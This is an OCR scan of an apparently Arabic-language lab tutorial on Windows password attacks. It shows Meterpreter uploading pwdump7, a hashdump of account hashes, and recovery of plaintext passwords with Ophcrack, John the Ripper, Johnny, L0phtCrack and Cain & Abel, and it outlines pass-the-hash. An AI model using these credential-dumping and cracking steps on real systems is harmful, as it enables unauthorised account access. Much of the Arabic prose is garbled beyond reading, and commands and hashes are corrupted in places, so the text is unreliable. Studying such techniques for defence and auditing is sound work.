Help Assistant: 1000 :c 3c 226b0c 3b fee 57c 031ee2773d 69b a0:620820d675a4ccc28055005e76e 8250c : : : 

JANA: 1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0dl6ae931b73c59d7e0c089c0: : : 

SUPPORT 388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2feala611bf83269b878555d3de675a3: 



:J?H& fgdump jt pwdump7 <> 5^ ^l^l^l l^Ji 

.t_fl^SI ^tkd! j| jlkij exploit cP*-M ^ 
.meterpreter cJi session ^ ^ 
i^Vl^ ^^Jl ^Uaill fgdump pwdump7 jj^j^ <-U*^ ^aj^a^JI 4^ >>r^l L_aL Jj*Vn ^jSj 



meterpreter > upload -r /pwdump 7/ C : \\WINDOWS\\sy stem32\\ 



[*] uploading 
[*] uploaded 
[*] uploading 
[*] uploaded 
[*] uploading 
meterpreter > 



/pwdump7//PwDump7. eie -> C: \WIND0WS\system32\\PwDump7. eie 
/pwdump7//PwDump7.eie -> C:\WIND0WS\system32\\PwDump7.eie 
/pwdump 7// readme. tit -> C:\WIND0WS\system32\\ readme. tit 
/pwdump 7// readme. tit -> C:\WIND0WS\system32\\ readme. tit 
/pwdump7//Ubeay 32.dll -> C:\WIND0WS\system32X\Ubeay32.dll 



i^VtS <J*±£\ meterpreter CMD ^Vl ^ 



meterpreter > execute -f cmd -c 
Process 2028 created. 
Channel 4 created. 
meterpreter > interact 4 
Interacting with channel 4... 

Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C: \WIND0WS\system32> 



.LLLai LftS pwdump7 u ^^ j ^ 
■xp jj^j J^^t fUaS pwdump6 f t.£2«it ^xp jj^j J^SJI fUaS (>*j V pwdump7 :4iajal* 
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Cracking Simple Lm Hashes 
^jij U .2014 l^J 8 V-j ^Office 2003 j Windows XP SP3 J^dl ^ ^ jjl^U ^ jl ^ UK 

^.^Inn <Jlj2 *^ (^J^ XP jj-^J ^ a hi) (j-a > J^C j # jjjlalill (J^axJ j ^Vlml <Jt ^ JJJ^^ ^y^AaajaLQ 7. 40 L>^ 

tilLiA .ILLoj Lo£ jkA* i^ul l^jj^^j ^j^3 j t^^lc <j^aj ^ jj^>^ ^ ^ U^3^ *^ jjj^li .AjjL^jII <JLgcV1 <J-?^ 

4 Salting (JL^ 3 ^ jffi S^aJ j <j^LkJl jj^Jl Clal jjq *nl l. n > nl j^Jl Ig fl^hin ^^jII A a\\ Jj^Iall ^j-d ^jAslSI 

Cracking Lm Passwords Online 4- 
^ lil) ^U^klaiJ! till £§ jA\ ± jx-±xjij Windows LM hash J^4^ ^ ^1 ^\ ^ ^jaxJI ^Ua 

jj^JI CjU^I j^SI (Ophcrack Objectif Securite ^1 j ^Vl <^ c^ja j 

Jaxj l^ii^jljj^j Cij jjjVI <£f^ 6 j^j^ ^ .SSD o^^ Rainbow table ^l^i^U 

.cjbj^a jljS ^ LM Password i> 

http://www.obiectif-securite.ch/en/ophcrack.php 

;XP j^ 1 ^ ^K (JjjIa . J^joJI \±±s U jc^ ^Uill clA^ ^ j lPW^ jj^ <J j^' u 11 

Hash: aad3b435b5 1404eeaad3b435b5 1404ee:3 Id6cfe0dl6ae93 Ib73c59d7e0c089c0 




^jC ^JjJ V Ui3 j (J^sUjojI j Igilk^l ^ill (JJJ^-li <LIL<JI Empty paSSWOrd J JJ^>^^ ^-aK ^^^C J jj^a^Jl ^Ualoal CJ^. liLd jlajl 

I^Vl^ ^LaJl ^Jjjl^Jlj 4ijLLJlj > ^1 Cljli (JjilA laJLujj ^jVI cJj^ a ^ 
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Hash: 17817c9fbf9d272af44dfalcb95cae33:6bcec2ba2597fD89189735afeaa300d4 

3 OBJECTIF SECURITE 



HOME AUDITS CONSULTING TRAINING OS LABS OPHCRACK CONTACT 



it 




Opcrack is a password cracker based on rainbow tables, a method that makes it 
possible to speed up the cracking process by using the result of calculations done in 
advance and stored rainbow tables. 

Ophcrackis being developed by Objectif Securite under the GPLv2 license. 

► Details 

► Download 



RAINBOW TABLES 

A set of rainbow tables has been created and optimised for use with Ophcrack. Most of 
them are available for free. A more advanced set of a size of more than 2TB aimed at 
security professionals can be bought for $999. 




Hash: 17817c9fbf9d272af44dfa1cb95cae33:6bcec2ba2597f089189735afeaa300d4 
Password: 72@Fee4S@mura! 



I Enter your password here to hash it 



Hash: d4b3b6605abecla!6a794128df6bc4da:14981697efb5db5267236c5fdbd74af6 



EE OBJECTIF SECURITE 




Opcrack is a password cracker based on rainbow tables, a method that makes it possible 
to speed up the cracking process by using the result of calculations done in advance and 
stored rainbow tables. 

Ophcrack is being developed by Objectif Securite under the GPLv2 license. 

► Details 



RAINBOW TABLES 

A set of rainbow tables has been created and optimised for use with Ophcrack. Most of 
them are available for free. A more advanced set of a size of more than 2TB aimed at 
security professionals can be bought for $999. 



Enter your LMHash here to crack it 



Hash: d4b3b6605abeda16a794128df6bc4da:14981697efb5db5267236c5fdbd74af6 
Password: *mZ?9% A jS743:! 



Enter your password here to hash it 



,(jjilgi3 <LLL<J! cs - ^ 6 ^—^ Cy* (J^ujujI a^j 

.Uial J&\ axj ^NTLM Jc* 2008 J /8/7 jj^J £±4 j XP Jj^j LM Jk^ 

Ajiat CjUjI^ ^Ij^j ^1 j^UVl g-i 4_n*^ JSl ( "i^i » ^i t (smartcards) CjtalkJI j (Biometrics) 



meterp reter > hashdump 

Adndnistrator:5GOs33efOe84e3al051136077a718ccdf409:ff8dfcd941b6f84958d0106aaf650fcd: : : 
Guest : 501 : aad3b435b51404eeaad3b435b51404ee ; 31d6cf eOd 16ae931b73c 59d7e0c089c0 : : : 
HelpAssistant: 1000: C3c226b0c3bf ec57c031ee2773d69ba0: 620820d 675a 4c cc28055005e76e 8250c : : : 
JANA: 1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0dl6ae931b73c59d7e0c089c0: : : 
SUPPORT 388945a0 : 1002 : aad3b435b51404eeaad3b435b51404ee : 2f ea la611bf 83269b878555d3de675a3 : 
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OBJECTIF SECURITE 



tn 



Opcrack is a password cracker based on rainbow tables, a method that makes it 
possible to speed up the cracking process by using the result of calculations done in 
advance and stored rainbow tables. 

Ophcrack is being developed by Objectif Securite under the GPLv2 license. 

► Details 

► Download 



RAINBOW TABLES 

A set of rainbow tables has been created and optimised for use with Ophcrack. Most of 
them are available for free. A more advanced set of a size of more than 2TB aimed at 
security professionals can be bought for $999. 



I Enter your LMHash here to crack it 



Hash: 33ef0e84e3a1 0511 36077 a71 8ccdf409:ff8dfcd941 b6f84958d01 06aaf650fcd 
Password: moramt58 



I Enter your password here to hash it 



Hash-identifier 

John the Ripper jjj*^ diLalS ^ ^* * -lt^ ^Uaj j jji ^vimi ^Jj^Aj sb) 

^ jj -ja-vlU \ a A laJLujI (j^J SbVI .l^Jib <Jjoij AlxJl 90 ^JJ 't-^ * <^^\ (J^-&^ CP" <^-*^ L_Lu£3l Aijllaj <J>ujjj 

lc jjjj jS^Vl ^ J^W ^^Sj L>^ v3'°^*l- ^^^^ ^ -L$W^ ^ JU ^ <J^"^J Hash ID cJ^^j .^}J-^ c>^-g-^ 

.vui^i jsVi ^ijjt ^ ^ j\ 4^ jst^i 

Kali Linux->Password Attacks -^Offline Attacks->Hash-Identifier 

i^Vl^ o^lgJI I^a ^ jh AA\ ±yu lJ* jjoj Hash ID J Jaia 



\ /\ _ "\ # 

v/ \ \ \/\ \ # 

\ \ \ \ \ \ # 

v \ \ \ \_\ \ # 

\ \ \ / # 

/ V / vl.l # 

By Zion3R # 
www.Blackploit.com # 
Root@Blackploit.com # 



# / 


\ \/\ \ 




/\ \ 




# \ 


. \ \ \ \ 




\ \ 


\ 


# 


\ \ \ /' ^ 


v / , 


\ \ \ 


*\ 


# 


\ \ \ \ \/\ \ \ 


\ /\ , 


. *\ \ 


\ \ \ \ 


# 


\ \ \ \ \ \ 


\ \/\ 


/ \ 


. \ \ \ \ 


# 


\/ /V /\/ /' 


\/ /\/ 


/ 


\/ /\/ / 



HASH : 6bcec2ba2597f 0m9189735af eaa3GGd4 



[+] Domain Cached Credentials - MD4 ( MD4 ( ( $pass) ) . ( st rtolower($use rname) ) ) 

Least Possible Hashs : 
[+] RAdmin v2.x 
[+] NTLM 
[+] MD4 



Findmyhash 
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#findmyhash <Encryption> -h hash 



reQtQkaliiHF findmyhash MD5 -h 5f4dct3b5aa765d61d8327debB82cf99 
Cracking hash: 5f4dcc3b5aa765d61d8327debBB2cf99 



Pass the HASH 

o jjiud^ll jjj-*lt cjLgK lit* <j£Jj t Windows LMj' SaiLo^I jj^II CjIaK ^Ia <jc Uja^j ^LuJI «^'o 

?NTLM 

jl c j£ai tdjj^i U£ j .Uj jjSI L^j j£ NTLM <j2Aa 'LM lA* NTLM <j2Aa jj^j ^-^1 



NTLM Hash r 

."Pass the Hash" ^uij j .^IkJI J jj^a jll <ul.ikU j L£ ^l^JI iUJl <LLouj ^V^j 

CjU^^ij jj^jll yi sbl jl ^\ <u£*j t*Ui axjj Local Security Authority Subsystem Service s 

-L> Aj J j| ^ ^Samba 

CjSJp) 7 jj^jj ^4 UAC ^ ^ViniAn ujUa ^laai) Sjj-a Lajl .CjUa^J) &a )3a 4-4jjfS ^Vmn kerberos jl NTLM2 

.Pass the Hash c> c> J'jj V ^ 

Passing the Hash with Metasploit Psexec ^ 
<iajudjj o^j*j <J-ac 3 1 ola ^ j^-j 6 . 6, ^ c ' ( -— j l Pass the Hash ^ ^ a laiLu^l l-uHjojVI ^ 1^1 j Psexec 

-Meterpreter c> 
Passing the Hash Toolkit 4- 

Kali Linux/Password Attacks/Passing the Hash 

l^a^JjoiJj 4 a\\ CjljLlk ^j-d D^cLabd (Jj^a^Jjojj ^ — help) JJJ^*^ ^ iklLuji ^^>^» . jj-^J 



JTR (John the Ripper): King of the Password Crackers 

jjo£3 obi t JTR 6 ^ jJI £y* ^ t° ^ ^^11 Jl^JI J jj^a jit ^^ialudj d& lij 
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^1 jji jjuo£j l^J ^gjoij ^jJI CjI^j^JI ^ ^jAxJI L$j^ jJI <-d^klaui jj^Jl CjUJ£ jjuo^I 4 m ui &b! ji&l John the Ripper 
f> ^ ^litill c fll un^yi C5 ic Sj^SlI John the Ripper j Sj^^l jj^JJ ciLaK Laj & jjuJI ciLaK ^ 4 qV^ ^ 

_ 4^oK £J^juu3 4 alia all Jj^Iall <C j±La <C a lA^l^cl (j£-aJj 

jail! ^ J**j John the Ripper 
. (Dictionary words)oL*^ CjUK ^ jjoJI CjUK jjo£ JjUj 



.(brute-force) s (Jjjuujj cJj^-^ 6 lS-^ •^ c - 



ja.) * 4-JjJal jJflVI CIjIaKII jl ^ -Lff jJai jlaVi ^jjj j^Ull L_Lj>l^J 4_lxij P^gjuo Jjl jli SbVI ^l^klojl Ak. 

^3^ji3 _(Ja. ja. dl^J (j!>Lk (Jjj^I jsll CjliLo (jl aJ ,4juLuJ1 JjuJI CjI Jjo^J ^a j^J V CjVI^JI (j-a <^ W^jj 3115 

.wc -1 FILNAME j-Vl lift 
.UjUIj lJjj^JI JaUjl Jj^iL JTR ^jij cLja 6 ji£l\ ^ cil3i£j 



#tr©A-Z©a-z©<©Word File©>©AU Lower Case File 



:c5 jVI^ cjiji jSsii yijy e ^io^i j^Vi <Jc Jis-a 



#sort©-u©AUL_ower_Case_File©>©No_Duplicates_File 



Password Attacks | Offline Attacks | John 



^11 <^ John the Ripper g3il 



^j-d ^ ^^jII 4 aI^II ^jjjIa (jjl^j l^iklj t^jjjl^JI jjl l^j^jlkl c^^il Jj^) - ^^ 4^<J£ jjLuIL ^ jij IjIIj t^Lplc 4^<J£ jll^j 

Jjj JTR ^ C5^^ ^ .^^^ ajjouIU 6jjSl<Jt CjI jlaaJl ^jl ^ ^U^l j ^ jJI 

Jlia jjII ^ia Jjjia liA J^-^ < ^'^^j .cracks per second (c/s) ^ o 1 ^ o- 3 ^^ j^j^^^ ^ 

#john —test 

iiLujj ^^jII lIjIIia^jII jj >Aj ^aLiJI ^Uaill d^U£ Ai^stxi (ill ^jjjj ^I^Vl (JjjjjIL» till j^jj l_a jjuj 11a 

l_s jjuj c ^j3I j ^No Duplicates File ir*^ j (3^^°^^ Jll<JI c aLJi Jla ^j^aj^a^xJI cjUJ^II c aL> ^1,^ nnV 

.(/etc/john/john.conf) ^1^1 ^ c> !iA Jxi jSajj .a^I jjaV! cjU3£3! ^UjV jjj^I a^Ij^j 



[Options] 

# Wordlist file name, to be use 
Wo rdlist = $J0HN/passwo rd .IslLA 


d in batch m 




# Use idle cycles only 
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LLLai l^j^^cl c _^j3! CjIaKII A^SXi jjjjuIj .Ujjaljjal passwords.lst ^1 ^ ^ LL *°^^ ^ 

cjUKII As^i LilS .(Wordlist = No_Duplicates_File.lst) J' (Wordlist = $JOHN/password.lst) ^ 
^l^ki^U t*Bi J .john.conf ^ j^JI ^ s^j* jjlj J No_Duplicates_File.lst 1*jI&L <^ 
jjui ; jjoJ! John the Ripper ^ l-ia^V .cjUKII ^ jl^j ^131 L_aLJI ^ (— wordlist) j^*^^ 

John the Ripper J^-^ ^ ^ .(/root/.john/) J^ll ^ john ^V^l J] ^ J) Vjl 

^> 

#john©hash 



root@JANA :~/. john# john hash 

Warning: detected hash type "Inn", but the string is also recognized as "nt" 
Use the " - -format=nt " option to force loading these as that type instead 
Warning: detected hash type "1m", but the string is also recognized as "nt2" 
Use the 11 - - format =nt 2" option to force loading these as that type instead 
Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2] ) 

[JANA] 

(SUPP0RT_388945a0) 

(Guest) 

:2)| 



.Enter <jj* j^l JMj^ & < ^ A£t <^ j-^VI Ski 4jjj] 

http://www.openwall.com/ 

Johnny 

. ^.K Jji^all ^Ikd ^UK jjo£ s j^l 4_n»JJI Cjli John the Ripper ( jjjViMl 4.1^ j3I ^^klaiJI ^ Johnny 
^1 jjV CjUI j^I iLkjU ^joij ^1 cjI£ j^JI (.> I^jJ Johnny < John the Ripper j*ljVI jl-^=] yr*J 
jjuJ! dLaKj cjUilgJI - la* ^ ^ VI c aJa^H ^^Jc. oj^ll Johnny .chW^j qj^-^I jj^>^I <*-^l£ ^ ^ jjuJI cjUJ£ ^ 

J^L titti] Johnny J^^JI SjSjl* jjp John the Ripper j^ljSft jk^ ^ SjSjIaJI CjU^^UI j*j ;4Jajal4 



Password Attacks | Offline Attacks and select Johnny 



:JN\ Johnny ?\**l^t 

;AJU3l <jujLaJl JJ^-la ^1 LS^^J 



Johnny 

FiLe Attack Passwords 






«_ P 

Open Passwd FiLe 


Start Attack Resume Attack Pause Attack 


Copy 





Options 

.□I 

Statistics 



Settings 
Output 
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J^l\ ^ q$ jl^j qfhW t^LJI ^jjaj I^Ll ^ ^\ j Open password file <jja j& cjIj^VI 3-^Ui3l J^Lk ^ 



FiLe Attack Passwords 



Open Passwd FiLe 



Start Attack 



Attack Pause Attack 



Options 

.□I 

Statistics 




3 3 efOe84e. 
aad3 b43 5b. 



3 c 226bOc 



id3 b43 5b. 
id3 b43 5b. 



GE CO S 

500:ffSdfcd941befS495Sd0106aaf650fcd:: : 
501:3 ld6cfeOdl6ae93 lb73c59d7eOcOS9cO::: 



1000:6203 20d675a4ccc2S0 5 5 O O 5e76eS250c: 



TOO 2: 2feala611bfS3 269bS7S555d3de575a3: 
1003:3 Id6cfe0dl6ae931b73c59d7e0c089c0: : 



^ j^Jl <c jj ^J^k c>« j Options , ^ c - u^*^ ( ♦ ]) \*>W ^5^* C5^^ ^ j^' -^j^ ^ j -^-^ ^3jj W^l J^Lk ^ 

,4\r\m ^jUj %90 J^j J^UI liA @jUj 



Johnny 



FiLe Attack Passwords 



Open Passv^d File Open Last Session | Start Attack Resume Attack Pause Attack 



Passwords 



Statistics 



Settings 



General options 

Format: 

Mode selection and settings 

C*> Default behaviour 

O "Single ct aclc" mode 

O Wo i d list m ode 

O "Incremental" mode 

O Exte r n a I mode 



Auto detect 



DefauLt behaviour ' "SingLe crack" mode WordList mode "Incremental" mode External, mode 



"single crack" mode, the 



ordlist mode, the 



n ere mental" mode. All with default 



.U Jjjj CjUKJ) AajV A&u <U) wordlist mode <^ <> 



DefauLt beha viour j "Single crack" mode WordList mode " LnezrennieinifcaiL" mode j External mode j 



Wordlist mode uses data from wordlist file. As an addition rules could be applied. Section "Wordlist" would be used to mangle words 
with rules. 



WordList fiLe: 
I I Use ruLes 

I I Use externaL mode, fiLter name: 



Browse 



LOphtCrack 

http://www.10phtcrack.com 
dia jjojjj^jUJ jiLJI jjoJI cjUJ£ ^bjloaV * ^ iklujl ^jj .cAlnlaSlI o^IsujojIj a al£ (jAvil a aa^a sbl ^ LOphtCrack 
6jS jSa^ll L^J fhj brute force attacks j 'rainbow table 'hybrid 'dictionary ^L**j jj^j 

.LOphtCrack s^cLuax a} Lgic- t **&\\ jjAbj jjuJI a jiill ^Uaj ^ ^-L^li^ c _^a c _^j3I 4_iLgVI j^*-^ .jjj*^ 
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^ill ASi-^J! ^tkj ^iiui <LAN Manager networking protocols JjSjSjjJI J^- < Jj^j J^ul( 
^UJI JjaJI qa jj^ (response) ^Ui^VI <> c^jU 24 f J^J (challenge) ciAjllI c> 8 t> uj^ 
<jUi^VI <> CjjU 24 ci^(response) ^W^VI ajjILu ^UJI UjL .challenge/response format J^ill 
^jjcLLa jj^Jl -j-^y 4_i* jjl j^J! ^ jkl dia .Ai^L^JI <jjlLJI ^jUjj I^jL ; j& L^IS ^ilt <j <j^aLkll (response) 

6L_fl^)^j AjUjoj JjoJI *LaK Jjuo^ (JJ*^ g a\\ ^-AuiJ j lS^^ ^Ua3 <j£3 (jjjlgJL ^al^l L_fl^)^j 4jUjoj (j* UJ^ «aflla 

<Lajla3l ^aiaill <J*-?^ >* u1 ^Aj^H J-*^ (J^ 1 A£jjoJI (jjjtg-ll (JUlSjI ( ; ^ > 6 ^jjoIa i '^t > >i .(J^jujI (Jjc^Jj 

^LOphtCrack 6. LOphtCrack brute-forcej dictionary LM 

<jc SjaslxJI (jjs jiJI ^aii dujjjll ^j^aLiJI wizard sbVI l_ ujjIIj ^ jij jjibj JjxjuHII ^Uaj 

.aJUII iJLSlI jj^> J\ ^jja (L0phtCrack6) 

ff^S^l LOphtCrack Password Auditor v6.0.1 6 — C 



LOphtCrack 6 Wizard 




► Stop 1 
Start 

LOphtCrack 



Step 2 

Get 

Encrypted 
Passwords 



Step 5 



Welcome to the LOphtOaeAt 6 Wizard. This wizard will 
prompt you with step-by-step instructions to get you 
auditing in minutes. 

First . the wizard will help you determine where to 
retrieve your encrypted passwords from. 
Second, you will be prompted with a few options 
regarding which methods to use to audit the 
passwords . 

Third, you will be prompted with how you wish to report 
the results. 

Then. LOphtCrack 6 will proceed auditing the 
passwords and report status to you along the way. 
notifying you when auditing is complete. 

Press "Next 'to continue with the wizard. 

Z_r - : ■ •=■ :■- : ■■ ze t -■- .:■:•= v. _- 




.I!**! {y±jA j& U£ A^ai i>jh±l\ UKij ^illj Next ti> LOphtCrack 6 Wizard ^ 

.ti> j^j Retrieve from the local machine ^ j 



LOphtCrack Password Auditor v6.0.1 6 




Get Encrypted Passwords 



Choose one of the following methods to retrieve the 
encrypted passwords: 

* Retrieve from the [ocal machine 

Pulls encrypted passwords from the local machine's 
registry. .Administrator access is required. 

Retrieve from a remote machine 

Retrieve encrypted passwords from a remote 
machine on your domain. Administrator access is 
required. 

O Retrieve from SAM/SYSTEM backup 

Use emergency repair disks, backup tapes, or 
volume shadow cop/ techniques to obtain a copy of 
the registry SAM and SYSTEM hives. This contains 
a copy of your non-domain passwords. 

O Retrieve by sniffing the local network 

Sniffing captures encrypted hashes in transit over 
your network. Logins, file sharing and print sharing 
all use network authentication that can be captured. 
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LOphtCrack Password Auditor vS.0.1 6 


_ □ | 


J Menu "| 




View - Help 



Run Import Import 
Wizard Hashes From Sniffer 



Begin Pause 



Stop Sessie 
Optio 




Step 1 

Start 

LOphtCrack 
Wizard 



Step 2 

Get 

Encrypted 
Passwords 



► Step a 

ChfiDSB 

Auditing 
Method 



Step 4 

Pick 

Reporting 
Style 



Step 5 

Be si n 
Auditing 



Choose Auditing Method J 



* Quick Password Audit 

This method checks only for simple passwords that 
you could find in a dictionary. 

Common Password .£udit 

This method checks for simple passwords that you 
could find in a dictionary, as well as common 
modifications of dictionary words. 

Strong Password Audit 

This method checks for simple passwords that you 
could find in a dictionary, common modifications of 
dictionary words, and performs a brute force attack 
that attempts all combinations of standard letters 
and numbers. 



Custom 



Custom Options.. 




^ ^J 1 cs^j (auditing method) J^tiM t> tfj^Vl ^ jfc tiSHSlI SjIsaJI jVI 

Strong Password j*j ^tjSI .o^M ^^^1 ^jS jAtill i> ls' 

,<ju\J\ <kjxJI J\ Jiisll Next c3> Audit 




LOphtCrack Password Auditor V6.0.16 



View ^ Help ^ 



Run Import Import 
Wizard Hashes From Sniffer 



Pause 



Stop Sessic 
Optio 




Pick Reporting Style 



P71 Display passwords when audited 

Most of the time, you II want to know what the 
audited passwords are, but in some situations, you 
may wish to verify the safety of a password without 
disclosing what it is. Check this box to view the 
cracked passwords in the output. 

Display encrypted password bashes' 

Check this box to display the encrypted passwords 
as they are seen by the operating system. These 
values may be of interest to some users and to 
others they may seem like excess clutter. To 
display the encrypted passwords, check this box. 

0 Display how long it took to audit each password 

Checking this box will add a column to the output 
view that shows how long it took to audit each 
password. 

[3 Display auditing method 

Check this box to display the method used to find 
each password. This can be useful for identifying 
users who have particularly weak passwords. 

F71 Make visible notification when auditing is done 



c Back 












= 



■ JtJ^\ o^j*^ cr^ cs^j Pick reporting Style u'j^ ^ ^ 

^ Ujlikj lJj^ dip. Display encrypted password 'hash' ^ ^ U^lj^l 

.wizard ^ Sj^Vl j 31^^31 JUi£U next <jja j& ^ ^ c£j^' 

.FINISH c3>^ 

■OK (jja j^" (Audit completed) ajLJI ^1 <iU <lt^j c*U j^j ^ 
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.session options sbVl Jb* -SjjUI ^ j^Vl <-^lS ^ 

LOphtCrack Password Auditor v6.0.1 6 - [Untitled 1 ] 



Run Import Import 
Wizard Hashes From Sniffer 



Begin Pause Stop 



Session 
Options 



Schedule Scheduled 
Audit Tasks 



Cracked Accounts 
Weak Passwords 
Expired Accounts 



Disable Force Password 
Accounts Change 



<1 Run f Report - 1 

Domain User Name 

A jana-teba 

t, JANA-TEBA 
X JANA-TEBA 
A JANA-TEBA 



LM Password 



Password Age (days) Locked Out 



jana 

LANGUARD_1 1_USER 



31 
34 



_tot; 



29156 
worids_cJone 
291S6 
_ d on e 



!□□ . □□□%, 



_hjsh_tables 

□ of □ 
_l]3shes_f oynd 

□ of □ 
^_clon 




05/02/2014 23:55:25 Multi-core operation with 2 cor es . 

05/02/2014 23:55:35 imported 2 accounts -From the "local machine 

05/02/2014 23:55:35 Audit started. 

05/02/2014 23:55:35 Auditing session completed. 



.to£al_ysers] 



:<^VI UA* J^j aJL^\ Session Options <ij* j^l ^ 
.Dictionary crack u' £ * j^' Crack NTLM Passwords 
.Dictionary/Brute Hybrid crack o'j^ £ * j^' Crack NTLM Passwords 
.Brute force crack u'j^ <r * Crack NTLM Passwords 
Enable Brute Force Minimum Character Count 
Enable Brute Force Maximum Character Count 

■OK c3j^ j& £ 



Auditing Options For This Session 



Dictionary Crack 



■s iEnabied! 

[7] Crack NTLM Passwords 



Dictionary List 



The Dictionary Crack :es:s for passwords that are 
the same as the words listed in the word file. This 
test is very fast and finds the weakest passwords. 



Dictionary/Brute hybrid Crack 
P71 Enabled 

[Vl Crack NTLM Passwords 
I Common letter substitutions 



□ 



Characters to pnepend 
Characters to append 



(much slower) 



The Dictionary/Brute hybrid Crack tests 
For passwords that are variations of the 
words in the word file. It finds passwords 
such as "DanaEfS" or "monkeys!". This 
test is fast and finds weak passwords. 



Pre computed 

I I Enabled Hash File List 

I I Preserve Precomputation Data 

Location: 



Also known as 'rainbow tables", the Pre computed 
Crack tests for passwords against a precompiled 
hashes contained in a file or files. This test is very 
Fast and finds passwords created from the same 
character set as the p recomputed hashes. 
Preserving precomputation data speeds up 
consecutive runs in exchange for disk space. 
This crack works against LM and NTLM passwords, 
but not Unix. 



Brute Force Crack 
£7] Enabled 

F71 Crack NTLM Passwords 

Character Set: 
| alphabet + numbers 



Language: 



English 



Custom Character Set llist each character): 

E T N R I OAS D H LCFPU M YG WVBXKQ JZetnrioasd a 
hlcfpumvgwvbnkqjz01 23456789 

[t71 Enable Brute Force Minimum Character Count 
H71 Enable Brute Force Maximum Character Count 



The Brute Force "-.= :< :es:s "i- l - ass.'" irds that 
are made up of the characters specified in the 
character set. Ft finds passwords such as 
"WeR3pFt&" or "vC5XG9n-12b" . This test is slow 
and finds medium to strong passwords. 

Enabling a start or end point lets you control the 
minimum and maximum number of characters to 
iterate. 

The actual maximum character count used may 
vary based on hash type. 

Specify a character set with more characters to 
crack stronger passwords. 



Range: 1 



Begin 



^ BEGIN (jj^ jSjj j 4juinj3l 4JL!ti\ OK (ij* j^l ^ 
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Ophcrack 



http://ophcrack.sourceforge.net 



fWimrtll j <uV . jjuJI djUK jxjSI rainbow tables J jj^j jju£3 stal j& Ophcrack 

.Ophcrack c5jj^ GUI j^j^ ? ^aJLmall a ^ uaj j CLI jVI ^ ^ cs - ^ cS-iT-uifll ^Uaj j^jj 

.NTLM jLM c> ^LiU ^£ - 
^ Vij . nil l cjUKII j^£3 Brute-force module 

. jj^j^ t> SAM 4 — aL^l\ (j^JI J^^j <yj£ 
<jc s^x^JI jUI ^2 dujjjli ^jUtj (j^aLkJ! wizard sl^VI c_ uinj ^ jij jj^ijj ^it_uu3I ^Uaj o 

jj^Ji ^U3! jLaiJI ^liil Jjj jo t5 JlS J ±L uull ^Ikj jl 4_JU3I 4_^L^I l^^j^ (Ophcrack) 

Password Attacks | Offline Attacks | Ophcrack 



Load 
Progress 



ophcrack 



Help 



Statistics 



Preferences 



LM Hash 



NT Hash 



LM Pwd 1 



LM Pwd 2 



Directory 



Progress 



Preload: waiting Brute force: 



waiting Pwd found: 



Time elapsed: 



jUUj L_fl jjoj jl^xJl ^AaJ *LajUi IVl (J^*^ load ^ J C5 J^*-^ L — ^ J^VI -^J^ (j-* Ja^iLj o 

.tijLa US^j ^1 pwdump sbVl ^1 j^J g 3 ^ t> ^ PWDUMP file ^ jLpJI ^ i> .SAM 



Single hash 



PWDUMP file 



Se: :ion file 

Encrypted SAM 

Local SAM with samdumpZ 

Local SAM with pwdurnpo 

Remote SAM 



NT Hash 



LM Pwd 1 



LM Pwd Z 
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" r=" 



£1 



User 

IM 

LANOU^D,11. 
-'■jg gr> bc-y 
Shirt* 



NT H**H 

5CBETDFA07^CX.. 
2DZDD2 12A4 . 



Drectory 



= r 



V? 



1 



r 



.ajIUII jj^i> (^Jl <^Jjj Tables <ij3 jailU ^jl*JI CjIjjsVI ^}j^> ^ o 



Table Selection 





Table 


Directory 


Status 


9 


XP free fast 




not installed 


9 


XP free small 




not installed 


9 


XP special 




not installed 


9 


XP german v1 




not installed 


9 


XP german v2 




not installed 


9 


Vista special 




not installed 


9 


Vista free 




not installed 


9 


Vista nine 




not installed 


9 


Vista eight 




not installed 


9 


Vista num 




not installed 


9 


Vista seven 




not installed 


9 


XP flash 




not installed 


9 


Vista eight XL 




not installed 


9 


Vista special XL 




not installed 











= enabled J = disabled 



= not installed 



Install 



OK 



Crack j jll (jj* J&j aj^uj jJI aJL5A\ ^ jj a \^<\ a*_> Rainbow table o^J 3-*^ ^aa J!^Lk ^ di^ o 
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Cain & Abel 



http : //www . oxid. it : j^^il 

CjUK (J* A atia a jjI S^UlaiV till 

'brute-force 'u^ CjIa^j* ^1,v^ Uj SjLU! jjuJI CjUK jjju£ j ^(sniffing network) 4£^t (jjuuaaoll J^Ll jjuJI 
^jlio s^Uiuilj '(decoding scrambled passwords) 3i jl^Jl jjuJI cjUK t*la < VolP^^^ <^ cjU^a 
£>i& ^ s^cLaixi . jj CjV j£ jj jjj lS^^ j tljSj-a jjoJI CiLaK c ^revealing password boxes ^aj^I^V 

.^^11 ^ cJ^ j uL^a j aJ^JI ^ ji im^M t ^> bSlsLaj ^1 (Arp Poison Routing) APR c> oj£z ai* 

JalSSlV cjU^^ ^ ^ jl^j <SSH-1 j HTTP SjiiuJI cjVj^jj jjJ! JJ^ Sj^IS I^jI ^ shVl ^ ^ Sniffing 

.jjjjill CjUII <> <*_Jj a^^^ ^> credentials 



Fie View Configure Tools Help 

1 eir*[© ih m i»|J+9|b|^qhhsmo«b 



I eft, D«*idff-5 | Ngtwgrk |fe Suffer I ^ Cradner TrMrpub? | ITCT CCDU I ' Wireless L|] Qu*ry | 

y Cradter *| [ User Name j LM Password | < & 1 rfT Pas. | WHMh ~~ 



SH LM & HTLM Ha*tv 

NTLMv2 Hashes CO) 
J| *«is -cache Hashes {' 

HQ Cisco I05-MD5Has* 
!5? sco ?:x-md5 Hash 

Hastes - 
^ CRAM-M35 Hashes 
4* OSPF-MD5 Hashes i 
RIPvZ-TOB Hashes 
4* WRP-mAC Hashes 
|6 WNC-3DES CO) 
"5? ^2 Hashes {□) 
"2, d «M Hashes (0) 
"V NDS Hashes (0) 
*J* 5HA-1 Mashes Oti 

*3* SHA-2HBShCE(0) 
tfo RIPEMD-160 hashei 
^ Kjtfbb PreAuihHBsJ- 
f& Radius shdrtd-Key 

:tE-PSK Hashes £Q) 
^A) MSSQL Hashes (OJ 
S| HySQL Hashes (0) 



± 



'if 1 



"IT Mesh 




Brutt -Force Attooc 



Cryptsnalysis Attack 
Rar*K3WCFacfc-Ortne 
Aclrv«£ync 



71DGFZL5291G... 



LM Hashes + challenge 

pjtlm Hashes 

ntlm washes + chatenge 

NTLM Sessicri Seeunri,' Haffies 



Select AJ 



T est passwor d 



Add to tet Insert 
Remove Delete 
